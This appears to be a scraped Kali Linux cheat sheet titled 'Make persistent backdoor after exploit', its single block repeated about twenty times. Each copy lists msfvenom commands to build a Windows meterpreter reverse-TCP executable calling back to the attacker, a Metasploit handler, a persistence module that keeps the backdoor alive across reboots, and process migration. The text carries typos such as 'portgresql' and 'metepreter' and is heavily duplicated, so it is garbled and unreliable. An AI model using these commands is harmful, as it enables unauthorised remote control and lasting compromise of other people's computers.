Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>
Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>
root@kali~#: service apache2 start
root@kali~#: service portgresql start
root@kali~#: msfconsole
root@kali~#: use multi/handler
root@kali~#: set payload windows/metepreter/reverse_tcp
root@kali~#: set lhost <your ip>
root@kali~#: show options
root@kali~#: run
meterpreter > run persistence –h
meterpreter > run persistence –U
target automatic reboot the system
msf exploit(handler) > exploit
metepreter > sysinfo
metepreter > ps
meterpreter > migrate <pid>